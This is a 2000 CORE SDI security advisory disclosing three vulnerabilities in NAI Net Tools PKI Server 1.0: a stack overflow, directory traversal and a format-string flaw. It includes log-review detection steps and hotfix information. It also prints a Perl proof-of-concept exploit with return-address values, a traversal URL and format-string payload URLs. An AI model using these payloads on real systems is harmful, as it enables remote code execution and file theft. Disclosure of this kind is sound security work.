----------------------------------------------------------------------- CORE SDI S.A. Buenos Aires, Argentina CORE SDI Security Advisory August 2nd, 2000 NAI Net Tools PKI Server vulnerabilities ----------------------------------------------------------------------- While investigating the exploitability of a buffer overflow in the Net Tools PKI Server from Network Associates Inc. we discovered three new vulnerabilities not fixed by hotfix 1, released to fix problems reported by Jim Stickley from Garrison Technologies Inc. (see http://www.securityfocus.com/bid/1363 and http://www.securityfocus.com/bin/1364) Problem description ~~~~~~~~~~~~~~~~~~~~ Problem #1: Buffer overflow in strong.exe A buffer overflow in the web server component of the Net Tools PKI server allows a remote attacker to execute arbitrary code as SYSTEM on the machine running it. To determine whether anyone has attempted to exploit this vulnerability, check the enroll-access.log and the admin-access.log files in the WebServer/logs directory of your Net Tools PKI Server installation. Search for any log entries which are excessively long (greater than 500 characters). Each log entry can then be examined to see the IP address of the computer that submitted the request. Problem #2: Directory traversal vulnerability The default installation of Net Tools PKI server allows a remote attacker to view and download any file residing on the server. To determine whether anyone has attempted to exploit this vulnerability, check the enroll-access.log and the admin-access.log files in the WebServer/logs directory of your Net Tools PKI Server installation. Search for any log entries containing "..\" within them. Each log entry can then be examined to see the IP address of the computer that submitted the request. Problem #3: Format strings with user supplied data The Net Tools PKI Server fail to validate properly the data passed as arguments to the server's logging routines and allows a remote attacker to execute arbitary code as SYSTEM on the machine running it. Impact ~~~~~~ Problem #1: Remote unauthenticated access to the PKI Server, execution of arbitrary commands as the user running the enrollment server (System) Problem #2: Remote unauthenticated access to any file on the PKI server Problem #3: Remote unauthenticated access to the PKI Server, execution of arbitrary commands as the user running the enrollment server (System) Technical details ~~~~~~~~~~~~~~~~~ Problem #1: Buffer overflow in strong.exe Strong.exe is the web server component of the PKI Server, it services requests over SSL on ports 443/tcp, 444/tcp and 445/tcp (default ports). While connections to port 443/tcp require both client and server autentication using certificates, connections to port 444/tcp requires no client authentication, therefore any user with network connectivity to the PKI server can connect via HTTPS to that port. The service running on port 443/tcp is called the Administrative Web Server and its therefore obvious the requirement for mutual authentication. The service running on port 444/tcp is the Enrollment Web Server and does not require a client side certificate by default. Both web servers are actually Virtual servers serviced by strong.exe A buffer overflow is present in the function that generates log data, that allows to overwrite the stack using user supplied data passed to the server as an URL in the HTTPS request. https://host:444/<2965 'A' chars> EAX=66206465 EBX=00F3E1C0 ECX=01FFF224 EDX=20414141 EDI=00000000 EBP=01FFFE60 ESP=01FFF258 EIP = 0040977B The value in EAX is part of the string (DATE+PATH+FILE+REASON) that gets logged, detailing the reason for the failure. Since it is not a valid address, a segmentation fault is rised a few instructions after the overwrite: mov ecx,[eax+000000E4] The above does not overwrite EIP and it kills the server before its overwritten, but a slight variation of it will let an attacker overwrite EBP, EIP and by carefully overwriting local variables, control the execution of arbitrary code on the target machine. A sample, proof of concept perl script exemplifies this: -- cut here #!/usr/bin/perl # NAI NetTools PKI SERVER 1.0 - Long URL Stack Overflow Exploit # Replace host and port an create the html file: #./pkiluso.pl > test.html #Open the html in a SSL compatible browser and click on the link. puf! #Juliano Rizzo (c) 2000 juliano@core-sdi.com $host = "localhost"; $port = "444"; $shell_code= "\x90\x90\x90\x90"; #We can set the values of EIP and EBP, our code is on the stack #and in 0x01613A2E. $eip = "\x2E\x3A\x61\x01";#0x01613A2E (URL readed from socket) #$eip = "\x64\x83\x40%00";#0x00408364 (CALL EBP) $ebp = "\xCB\xF2\01\x02"; #0x0200F2CB (trunca el string por el 00) $noplen = (2965 - length($shell_code)); print "Click here to exploit.!"; note: wrapped for readability ---- Problem #2: Directory traversal vulnerability By specifying '..\' in HTTPS requests to the enrollment server, an attacker can navigate the server's file system and view/download any file if its name is known. By default the enrollment server uses \Program Files\Network Associates\Net Tools PKI Server\WebServer\enroll-server as the Web Root directory, if a file name is known (ie. autoexec.bat) the attacker just needs to supply the remaining path components to access it: https://host:444/..\..\..\..\..\autoexec.bat will display the contents of the file in the browser If a filename is not known, the web server will reveal its web root directory in an error messages shown to the client: https://host:444..\..\pirulo.pdf will result in: File Not Found The requested URL /..\..\pirulo.pdf was not found on this server. There was also some additional information available about the error: [Tue Jun 27 19:47:33 2000] access to C:\Program Files\Network Associates\ Net Tools PKI Server\WebServer\enroll-server/..\..\pirulo.pdf failed for a.b.c.d, reason: File does not exist Problem #3: Format strings with user supplied data The user supplied URL is processed by Strong.exe and if the .XUDA extension is found, the request is forwarded to XUDAD.EXE for futher processing. Prior to this "hand-off" the URL string is parsed, filtered for metacharacters and passed to a function that logs the request. Somewhere along the processing path, the user supplied data becomes the format string for a formatted output function similar to the ANSI C sprintf(). This allows a remote attacker to provide data that will force that function into overwritting arbitrary portions of the process memory and cause either a denial of service attack or the execution of arbittrary code. To exemplify this, the following URL will cause a DoS: https://host:444/%25%25s.xuda Notice that the hex value 0x25 represent the ASCII character '%', thus the URL string will get converted to "%%s.xuda" and subsequentelly to "%s.xuda". A more elaborated attack, might try to overwrite the return address on the stack to force the server into executing arbitrary code. Proof of concept , sample URL: https://host:444/xxx%3c%b9%ff%01%25%25x%25%25x%25%25x%25%25x%25%25x%25\ %25x%25%25x%25%25x%25%25x%25%25x%25%25x%25%25x%25%25x%25%25x%25%25x%25\ %25x%25%25x%25%25x%25%25x%25%25x%25%25x%25%25x%25%25x%25%25x%25%25x%25\ %25x%25%25x%25%25x%25%25x%25%25x%25%25x%25%25x%25%25x%25%25x%25%25x%25\ %25x%25%25x%25x%25n.xuda note: the string has been wrapped for readability. Fix information ~~~~~~~~~~~~~~~ Network Associates Inc. has released Hotfix 3 for the Net Tools PKI Server. It corrects the three problems. It can be obtained from: http://www.nai.com/asp_set/download/upgrade/find.asp Or contact Network Associates Technical support at 1-800-722-3709. Vulnerable systems ~~~~~~~~~~~~~~~~~~ Net Tools PKI server 1.0 for NT Net Tools PKI server 1.0 for NT (hotfix 1) Net Tools PKI server 1.0 for NT (hotfix 2) Additional information ~~~~~~~~~~~~~~~~~~~~~~ These vulnerabilities were discovered by Juliano Rizzo at CORE SDI S.A. Previous problems were found and reported to Network Associates Inc. by Jim Stickley from Garrison Technologies Inc. We wish to thank Network Associates Inc. for their prompt response to the issues rised by this advisory. Copyright Notice: ~~~~~~~~~~~~~~~~~ The contents of this advisory are copyright (c) 2000 CORE SDI S.A. and may be distributed freely provided that no fee is charged for this distribution and proper credit is given. $Id: PKI_Server-advisory.txt,v 1.4 2000/08/02 18:15:40 iarce Exp $ -- "Understanding. A cerebral secretion that enables one having it to know a house from a horse by the roof on the house, It's nature and laws have been exhaustively expounded by Locke, who rode a house, and Kant, who lived in a horse." - Ambrose Bierce ==================[ CORE Seguridad de la Informacion S.A. ]========= Iván Arce Presidente PGP Fingerprint: C7A8 ED85 8D7B 9ADC 6836 B25D 207B E78E 2AD1 F65A email : iarce@core-sdi.com http://www.core-sdi.com Pte. Juan D. Peron 315 Piso 4 UF 17 1038 Capital Federal Buenos Aires, Argentina. Tel/Fax : +(54-11) 4331-5402 Casilla de Correos 877 (1000) Correo Central ===================================================================== --- For a personal reply use iarce@core-sdi.com